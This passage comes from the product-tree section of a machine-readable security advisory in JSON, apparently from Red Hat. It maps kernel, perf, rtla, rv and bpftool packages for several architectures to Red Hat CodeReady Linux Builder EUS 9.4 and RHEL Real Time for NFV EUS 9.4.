"name": "perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "rtla-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "rv-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "rv-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "rv-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bpftool-0:7.3.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64"
},
"product_reference": "bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bpftool-0:7.3.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bpftool-0:7.3.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x"
},
"product_reference": "bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bpftool-0:7.3.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64"
},
"product_reference": "bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64"
},
"product_reference": "bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x"
},
"product_reference": "bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64"
},
"product_reference": "bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:5.14.0-427.114.1.el9_4.src as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src"
},
"product_reference": "kernel-0:5.14.0-427.114.1.el9_4.src",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch"
},
"product_reference": "kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le"
},
